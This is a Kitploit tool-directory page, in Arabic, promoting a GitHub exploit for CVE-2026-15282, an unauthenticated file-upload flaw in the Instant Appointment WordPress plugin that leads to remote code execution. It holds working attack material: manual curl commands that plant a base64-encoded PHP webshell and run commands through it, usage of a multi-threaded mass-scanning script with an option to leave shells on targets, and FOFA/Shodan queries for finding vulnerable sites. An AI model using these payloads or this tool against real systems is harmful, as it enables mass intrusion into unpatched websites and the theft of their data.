Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-15282 — Instant Appointment <= 1.2 — رفع ملفات تعسفي بدون مصادقة إلى تنفيذ تعليمات برمجية عن بُعد عبر add_service_front AJAX | CVSS 9.8 | Kitploit
أدوات/GitHubGitHub/shinthink/cve-2026-15282
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubshinthink/cve-2026-15282

CVE-2026-15282

Instant Appointment <= 1.2 — رفع ملفات تعسفي بدون مصادقة إلى تنفيذ تعليمات برمجية عن بُعد عبر add_service_front AJAX | CVSS 9.8

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-15282 — استغلال جماعي لثغرة RCE في Instant Appointment

بدون مصادقة: file_get_contents() + file_put_contents() → قشرة ويب PHP


نظرة عامة

CVE-2026-15282 هي ثغرة حرجة (CVSS 9.8) تتيح رفع ملفات تعسفي بدون مصادقة في إضافة ووردبريس Instant Appointment (الإصدارات ≤ 1.2).

يتم تسجيل إجراء AJAX باسم add_service_front عبر wp_ajax_nopriv_ للوصول بدون مصادقة. يمرّر المعالج القيم التي يقدّمها المستخدم image_url وimage_name مباشرة إلى file_get_contents() وfile_put_contents() دون أي تحقق من نوع الملف أو امتداده.

الإصدارات المتأثرة

الإصدارالحالة
≤ 1.2متأثر
> 1.2لا يوجد تصحيح متاح — قم بإزالة الإضافة

آلية الثغرة

السبب الجذري

root@kitploit:~
// ajax_services.php
function insapp_upload_image_as_attachment($image_url, $file_name, $product_id) {
    $image_data = file_get_contents($image_url);       // downloads from ANY URL
    $file = $upload_dir['path'] . '/' . $file_name;    // uses attacker's filename
    file_put_contents($file, $image_data);             // no extension check!
}

يقبل معالج AJAX أي image_url (بما في ذلك عناوين data://) ويكتب أي image_name مباشرة إلى دليل رفع الملفات في ووردبريس.

تسلسل الهجوم

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=add_service_front
  image_url=data://text/plain;base64,PD9waHAgc3lzdGVt...
  image_name=think_xxx.php
→ PHP webshell written to wp-content/uploads/YYYY/MM/think_xxx.php
→ RCE via https://target.com/wp-content/uploads/YYYY/MM/think_xxx.php?c=id

التثبيت

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-15282.git
cd CVE-2026-15282
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python cve_2026_15282.py -t target.com
python cve_2026_15282.py -f targets.txt -o shells.txt
python cve_2026_15282.py -t target.com --debug
python cve_2026_15282.py -t target.com --no-cleanup

الوسائط

root@kitploit:~
  -t, --target      Single target
  -f, --file        Target list
  -o, --output      Save RCE URLs to file
  --threads         Workers (default: 25)
  --no-cleanup      Leave shells on target
  --debug           Show every request
  -v, --verbose     Verbose output

إثبات المفهوم

هدف واحد

root@kitploit:~
$ python cve_2026_15282.py -t target.com
root@kitploit:~
  ⠋ Scanning target...  →  OK Scanning target...

  Host       : target.com
  Plugin     : YES
  Upload     : YES
  RCE        : YES
  Shell      : https://target.com/wp-content/uploads/2026/07/think_a1b2c3.php?c=id
  Output     : uid=33(www-data) gid=33(www-data)

الفحص الجماعي

root@kitploit:~
  [.] current-target.com | ⠋ [████░░░░░░░░░░░░░] 45/500 (9%) Plugin:12 UP:3 RCE:1
  [RCE] target.com   https://target.com/wp-content/uploads/2026/07/think_xxx.php

الاستغلال اليدوي

root@kitploit:~
# 1. Create base64-encoded PHP shell
echo '<?php system($_GET["c"]); ?>' | base64 -w0

# 2. Upload via AJAX
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
  -d 'action=add_service_front' \
  -d 'service_name=test' \
  -d 'image_url=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==' \
  -d 'image_name=shell.php' \
  -d 'image_size=100' \
  -d 'image_type=image/jpeg' \
  -d 'service_price_sale=1' \
  -d 'service_price_reg=1' \
  -d 'service_category[]=1' \
  -d 'service_duration=60' \
  -d 'service_author=1'

# 3. Access shell
curl -sk 'https://target.com/wp-content/uploads/2026/07/shell.php?c=id'

FOFA / Shodan

root@kitploit:~
FOFA:   body="wp-content/plugins/instant-appointment"
Shodan: http.html:"instant-appointment"

إخلاء المسؤولية

لأغراض التعليم والاختبار المصرح به فقط.


المراجع

المصدرالرابط
WPScan

غير تابعة لـ tenteeglobal أو Instant Appointment.

تنزيل الأداة
wpscan.com/vulnerability/b3457e95
Wordfencewordfence.com
NVDCVE-2026-15282
الباحثRandom Robbie (What Security)